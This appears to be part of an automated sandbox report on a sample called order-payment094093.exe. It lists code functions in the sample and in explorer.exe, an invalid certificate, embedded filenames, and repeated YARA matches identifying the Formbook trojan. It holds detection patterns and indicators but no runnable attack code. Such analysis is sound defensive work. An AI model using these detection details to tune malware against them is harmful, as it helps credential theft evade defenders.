Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_09DC6E00	11_2_09DC6E00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00A95E78	13_2_00A95E78
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052E0535	13_2_052E0535
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_053A0591	13_2_053A0591
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05384420	13_2_05384420
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05392446	13_2_05392446
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0538E4F6	13_2_0538E4F6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052E0770	13_2_052E0770
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05304750	13_2_05304750
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052DC7C0	13_2_052DC7C0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052FC6E0	13_2_052FC6E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052D0100	13_2_052D0100
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0537A118	13_2_0537A118
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05368158	13_2_05368158
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_053A01AA	13_2_053A01AA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_053941A2	13_2_053941A2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_053981CC	13_2_053981CC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05372000	13_2_05372000
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0539A352	13_2_0539A352
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_053A03E6	13_2_053A03E6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052EE3F0	13_2_052EE3F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05380274	13_2_05380274
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_053602C0	13_2_053602C0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0537CD1F	13_2_0537CD1F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052EAD00	13_2_052EAD00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052F8DBF	13_2_052F8DBF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052DADE0	13_2_052DADE0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052E0C00	13_2_052E0C00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05380CB5	13_2_05380CB5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052D0CF2	13_2_052D0CF2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05300F30	13_2_05300F30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05382F30	13_2_05382F30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05322F28	13_2_05322F28
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05354F40	13_2_05354F40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0535EFA0	13_2_0535EFA0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052ECFE0	13_2_052ECFE0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052D2FC8	13_2_052D2FC8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0539EE26	13_2_0539EE26
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052E0E59	13_2_052E0E59
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0539CE93	13_2_0539CE93
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052F2E90	13_2_052F2E90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0539EEDB	13_2_0539EEDB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052F6962	13_2_052F6962
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052E29A0	13_2_052E29A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_053AA9A6	13_2_053AA9A6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052E2840	13_2_052E2840
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052EA840	13_2_052EA840
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052C68B8	13_2_052C68B8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0530E8F0	13_2_0530E8F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0539AB40	13_2_0539AB40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05396BD7	13_2_05396BD7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052DEA80	13_2_052DEA80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05397571	13_2_05397571
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0537D5B0	13_2_0537D5B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_053A95C3	13_2_053A95C3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0539F43F	13_2_0539F43F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052D1460	13_2_052D1460
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0539F7B0	13_2_0539F7B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05325630	13_2_05325630
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_053916CC	13_2_053916CC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_053AB16B	13_2_053AB16B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0531516C	13_2_0531516C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052CF172	13_2_052CF172
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052EB1B0	13_2_052EB1B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_053970E9	13_2_053970E9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0539F0E0	13_2_0539F0E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052E70C0	13_2_052E70C0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0538F0CC	13_2_0538F0CC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0539132D	13_2_0539132D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052CD34C	13_2_052CD34C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0532739A	13_2_0532739A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052E52A0	13_2_052E52A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_053812ED	13_2_053812ED
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052FB2C0	13_2_052FB2C0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05397D73	13_2_05397D73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05391D5A	13_2_05391D5A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052E3D40	13_2_052E3D40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052FFDC0	13_2_052FFDC0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05359C32	13_2_05359C32
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0539FCF2	13_2_0539FCF2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0539FF09	13_2_0539FF09
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0539FFB1	13_2_0539FFB1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052E1F92	13_2_052E1F92
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052A3FD2	13_2_052A3FD2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052A3FD5	13_2_052A3FD5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052E9EB0	13_2_052E9EB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05375910	13_2_05375910
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052E9950	13_2_052E9950
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052FB950	13_2_052FB950
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0534D800	13_2_0534D800
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052E38E0	13_2_052E38E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0539FB76	13_2_0539FB76
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052FFB80	13_2_052FFB80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05355BF0	13_2_05355BF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0531DBF9	13_2_0531DBF9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05353A6C	13_2_05353A6C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0539FA49	13_2_0539FA49
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05397A46	13_2_05397A46
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05325AA0	13_2_05325AA0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0537DAAC	13_2_0537DAAC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05381AA3	13_2_05381AA3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0538DAC6	13_2_0538DAC6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330E269	13_2_0330E269
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330E7DC	13_2_0330E7DC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330E57B	13_2_0330E57B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330D5A3	13_2_0330D5A3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330D5A6	13_2_0330D5A6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330D9F1	13_2_0330D9F1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_032F2FB0	13_2_032F2FB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330DE2E	13_2_0330DE2E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_032F9E60	13_2_032F9E60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_032F2D87	13_2_032F2D87
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_032F2D90	13_2_032F2D90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_064FAE60	13_2_064FAE60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0650EE2E	13_2_0650EE2E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0650F7DC	13_2_0650F7DC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_064F3FB0	13_2_064F3FB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0650F57B	13_2_0650F57B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_064F3D87	13_2_064F3D87
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_064F3D90	13_2_064F3D90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0650E5A3	13_2_0650E5A3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0650E5A6	13_2_0650E5A6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0650F269	13_2_0650F269
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0650E9F1	13_2_0650E9F1

Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: String function: 0129EA12 appears 86 times
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: String function: 0121B970 appears 280 times
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: String function: 012AF290 appears 105 times
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: String function: 01277E54 appears 103 times
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: String function: 01265130 appears 58 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 0534EA12 appears 86 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 05315130 appears 58 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 052CB970 appears 280 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 05327E54 appears 111 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 0535F290 appears 105 times

Source: order-payment094093.exe

Static PE information: invalid certificate

Source: order-payment094093.exe, 00000000.00000002.2125511708.00000000046B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dllD vs order-payment094093.exe
Source: order-payment094093.exe, 00000000.00000002.2143454244.0000000009FC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs order-payment094093.exe
Source: order-payment094093.exe, 00000000.00000002.2139772310.0000000007C40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dllD vs order-payment094093.exe
Source: order-payment094093.exe, 00000000.00000002.2121435877.000000000119E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs order-payment094093.exe
Source: order-payment094093.exe, 00000000.00000002.2140928194.00000000095B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameQQXS.exe@ vs order-payment094093.exe
Source: order-payment094093.exe, 00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs order-payment094093.exe
Source: order-payment094093.exe, 00000009.00000002.2202520951.0000000002F00000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: \[FileVersionLegalCopyrightOriginalFilenameInternalNameCompanyNameProductNameProductVersionFileDescription vs order-payment094093.exe
Source: order-payment094093.exe, 00000009.00000002.2198084111.000000000131D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs order-payment094093.exe
Source: order-payment094093.exe, 00000009.00000002.2202520951.0000000003321000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameEXPLORER.EXEj% vs order-payment094093.exe
Source: order-payment094093.exe	Binary or memory string: OriginalFilenameQQXS.exe@ vs order-payment094093.exe

Source: order-payment094093.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9.2.order-payment094093.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.order-payment094093.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.order-payment094093.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.order-payment094093.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.order-payment094093.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.order-payment094093.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.3333395951.0000000011211000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000016.00000002.2359960797.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000016.00000002.2359960797.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.2359960797.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.3317227992.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3317227992.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.3317227992.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.3318427061.00000000050F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3318427061.00000000050F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.3318427061.00000000050F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.3320712611.0000000006470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3320712611.0000000006470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.3320712611.0000000006470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: order-payment094093.exe PID: 1136, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
